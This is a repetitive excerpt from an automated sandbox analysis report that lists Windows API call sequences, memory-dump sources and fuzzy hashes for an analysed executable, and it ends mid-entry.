                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$Parent
                                                                        • String ID:
                                                                        • API String ID: 2351499541-0
                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                        • String ID:
                                                                        • API String ID: 1795658109-0
                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                        APIs
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 2886238975-0
                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                        • String ID:
                                                                        • API String ID: 1792727568-0
                                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                        APIs
                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                        • String ID: cdecl
                                                                        • API String ID: 3850814276-3896280584
                                                                        • Opcode ID: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                        • Opcode Fuzzy Hash: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                        APIs
                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                        • gethostbyname.WSOCK32(?), ref: 0046D42D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 2502553879-0
                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                        • String ID:
                                                                        • API String ID: 1358664141-0
                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
